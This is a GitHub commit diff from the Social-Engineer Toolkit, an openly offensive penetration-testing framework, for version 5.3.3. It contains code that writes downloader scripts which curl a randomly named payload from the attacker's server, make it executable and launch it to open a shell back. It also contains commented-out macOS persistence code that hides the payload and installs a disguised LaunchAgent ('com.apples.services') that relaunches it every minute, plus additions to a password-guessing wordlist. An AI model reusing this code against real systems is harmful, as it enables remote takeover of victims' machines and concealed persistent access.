mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-12-11 21:42:35 +00:00
SET version 5.3.3 release - many bug fixes
This commit is contained in:
parent
85c889d311
commit
74ee6a6fa4
4 changed files with 80 additions and 6 deletions
|
@ -247,6 +247,10 @@ LINUX_PAYLOAD_DELIVERY=linux/x86/meterpreter/reverse_tcp
|
||||||
### DO YOU WANT TO USE A CUSTOM OSX AND LINUX PAYLOAD
|
### DO YOU WANT TO USE A CUSTOM OSX AND LINUX PAYLOAD
|
||||||
CUSTOM_LINUX_OSX_PAYLOAD=OFF
|
CUSTOM_LINUX_OSX_PAYLOAD=OFF
|
||||||
#
|
#
|
||||||
|
#
|
||||||
|
### THIS WILL USE A CUSTOM PLIST FOR PERSISTENCE ON OSX
|
||||||
|
ENABLE_PERSISTENCE_OSX=OFF
|
||||||
|
#
|
||||||
### User agent string for when using anything that clones the website, this user agent will be used
|
### User agent string for when using anything that clones the website, this user agent will be used
|
||||||
USER_AGENT_STRING=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
|
USER_AGENT_STRING=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
|
||||||
#
|
#
|
||||||
|
|
|
@ -1,3 +1,11 @@
|
||||||
|
~~~~~~~~~~~~~~~~
|
||||||
|
version 5.3.3
|
||||||
|
~~~~~~~~~~~~~~~~
|
||||||
|
|
||||||
|
* fixed an issue that would cause the download to randomized name to work properly on OSX
|
||||||
|
* fixed an issue that was preventing setoolkit from properly executing on root and moved to /tmp
|
||||||
|
* added better stability for osx exploitation
|
||||||
|
|
||||||
~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~
|
||||||
version 5.3.2
|
version 5.3.2
|
||||||
~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~
|
||||||
|
|
|
@ -1,9 +1,7 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
############################################
|
############################################
|
||||||
#
|
|
||||||
# Code behind the SET interactive shell
|
# Code behind the SET interactive shell
|
||||||
# and RATTE
|
# and RATTE
|
||||||
#
|
|
||||||
############################################
|
############################################
|
||||||
import os
|
import os
|
||||||
import sys
|
import sys
|
||||||
|
@ -168,17 +166,78 @@ if posix == True:
|
||||||
payload_flags = webserver.split(" ")
|
payload_flags = webserver.split(" ")
|
||||||
# grab osx binary name
|
# grab osx binary name
|
||||||
osx_name = generate_random_string(10,10)
|
osx_name = generate_random_string(10,10)
|
||||||
downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2])
|
downloader = "#!/bin/sh\ncurl -C -O http://%s/%s > /tmp/%s\nchmod +x /tmp/%s\n./tmp/%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2])
|
||||||
filewrite.write(downloader)
|
filewrite.write(downloader + "\n")
|
||||||
|
persistence = check_config("ENABLE_PERSISTENCE_OSX=").lower()
|
||||||
|
if persistence == "on":
|
||||||
|
print "Coming soon.."
|
||||||
|
# modified persistence osx from http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
|
||||||
|
#filewrite.write(r"mkdir ~/Library/.hidden")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write("cp /tmp/%s ~/Library/.hidden" % (osx_name))
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '#!/bin/bash' > ~/Library/.hidden/connect.sh")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write("echo './%s %s %s &' >> ~/Library/.hidden/connect.sh" % (osx_name, payload_flags[1], payload_flags[2]))
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo 'chmod +x ~/Library/.hidden/connect.sh' >> ~/Library/.hidden/connect.sh")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"mkdir ~/Library/LaunchAgents")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write("echo '<plist version=\"1.0\">' > ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<dict>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<key>Label</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<string>com.apples.services</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<key>ProgramArguments</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<array>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<string>/bin/sh</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write("echo '<string>'$HOME'/Library/.hidden/connect.sh</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '</array>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<key>RunAtLoad</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<true/>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<key>StartInterval</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<integer>60</integer>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<key>AbandonProcessGroup</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<true/>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '</dict>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '</plist>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"chmod 600 ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"launchctl load ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
# grab nix binary name
|
# grab nix binary name
|
||||||
|
#linux_name = check_options("NIX.BIN=")
|
||||||
linux_name = generate_random_string(10,10)
|
linux_name = generate_random_string(10,10)
|
||||||
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],linux_name,linux_name,linux_name,payload_flags[1],payload_flags[2])
|
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],linux_name,linux_name,linux_name,payload_flags[1],payload_flags[2])
|
||||||
filewrite = file(setdir + "/web_clone/nix.bin", "w")
|
filewrite = file(setdir + "/web_clone/nix.bin", "w")
|
||||||
filewrite.write(downloader)
|
filewrite.write(downloader)
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
shutil.copyfile("src/payloads/set_payloads/shell.osx", setdir + "/web_clone/%s" % (osx_name))
|
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.osx", setdir + "/web_clone/%s" % (osx_name))
|
||||||
shutil.copyfile("src/payloads/set_payloads/shell.linux", setdir + "/web_clone/%s" % (linux_name))
|
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.linux", setdir + "/web_clone/%s" % (linux_name))
|
||||||
|
|
||||||
|
# copy over the downloader scripts
|
||||||
|
osx_down = check_options("MAC.BIN=")
|
||||||
|
lin_down = check_options("NIX.BIN=")
|
||||||
|
shutil.copyfile(setdir + "/web_clone/nix.bin", setdir + "/web_clone/%s" % (lin_down))
|
||||||
|
shutil.copyfile(setdir + "/web_clone/mac.bin", setdir + "/web_clone/%s" % (osx_down))
|
||||||
|
|
||||||
# check to see if we are using a staged approach or direct shell
|
# check to see if we are using a staged approach or direct shell
|
||||||
stager = check_config("SET_SHELL_STAGER=").lower()
|
stager = check_config("SET_SHELL_STAGER=").lower()
|
||||||
|
|
|
@ -1,3 +1,6 @@
|
||||||
|
default
|
||||||
|
test
|
||||||
|
testing
|
||||||
password2
|
password2
|
||||||
|
|
||||||
password
|
password
|
||||||
|
|
Loading…
Reference in a new issue